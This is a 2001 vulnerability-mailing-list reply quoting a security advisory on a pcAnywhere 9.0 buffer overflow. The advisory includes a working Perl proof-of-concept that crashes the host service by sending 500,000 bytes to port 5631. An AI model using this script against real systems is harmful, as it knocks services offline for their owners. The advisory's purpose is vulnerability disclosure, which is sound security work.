Re: Symantec pcAnywhere 9.0 DoS / Buffer Overflow

[Eddie Harari <eddieh () YOU-NIVERSITY COM>]

Hi ,

 I could not repeat this Overflow on a Win2K.

 Just Thoght you would like to know ...


-----Original Message-----
From: Zoa_Chien [mailto:zoachien () SECURAX ORG]
Sent: Monday, February 12, 2001 1:22 AM
To: VULN-DEV () SECURITYFOCUS COM
Subject: Symantec pcAnywhere 9.0 DoS / Buffer Overflow


============================================================================
=
Securax-SA-14                                               Security
Advisory
belgian.networking.security
Dutch
============================================================================
=
Topic:          Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:      2001-02-08
Affects:        Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE
============================================================================
=



  Note: This  entire  advisory has been based upon trial and error results.
We
        can not ensure the information  below is 100% correct being that we
do
        not have any source code to audit.  This document is subject to
change
        without prior notice.

        If you happen to find more information / problems concerning the
below
        problem  or  further varients please contact me on the following
email
        incubus () securax net, or you can contact info () securax org.


  I.  Problem Description
  -----------------------

  Symantec PcAnywhere is a program that  will allow others (who are
authorised
  to have access :)) to use your pc. It's simular to a Windows NT 4.0
terminal
  server.

  PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports,
5631
  (pcanywheredata, according to nmap) and 65301 (pcanywhere).  And when a
user
  sends certain data in a particular way, pcAnywhere will crash.

  When a large amount  (it depends,  sometimes the host will go down with
320k
  characters, sometimes, you will have to send 500k bytes of data) are sent
to
  a 'waiting' host on  the pcanywheredata port, "AWHOST32.EXE" will crash,
and
  give an error on the screen, and write the "Unexpected program error"  to
a
  logfile. (with EAX, EBX, ... so read them, you'll find the yummy
0x61616161)

  Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on
them.

  Why no exploit, just a lame Denial of Service?

    1.) because I suck in win32 debugging / overflowing (but i'm reading)
        /* so if I can overflow win32 progs, i'll code an exploit */
    2.) as the amount of data is variable, it's hard to overflow..

  The DoS code:

  <--bof-->

   #!/usr/bin/perl

   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   #          by incubus <incubus () securax net>
   #                       http://www.hexyn.be
   #
   #                    http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   #            Zym0tic, segfault, #securax () irc hexyn be
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   #
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV[0]";
   $port = 5631;
   if ($#ARGV<0) {
   print "use it like: $0 <hostname>\n";
   exit();
   }
   $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
   print "hello\n";
   $buf = "";
   for($counter = 0; $counter < 500000; $counter++) {
           $buf .= "\x61";
   }
   print $socket "$buf\n";
   close($socket);
   exit();

  <--eof-->


  II. Impact
  ----------

  If someone exploits this, than Symantec is forced to rename the name of
this
  product to PcAnyoneAnywhere or something...

  No, seriously, this could lead to a compromise of a system.


  III. possible workarounds
  -------------------------

  This advisory was also  sent to Symantec (info () symantec com), we'll see
what
  they do with it...

  IV credits
  ----------
  love to Tessa.
  greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron,
segfau|t,
                     and so many, many  others I forgot...


============================================================================
=
For more information
incubus () securax org
Website
http://www.securax.org
Advisories/Text
http://www.securax.org/pers
----------------------------------------------------------------------------
-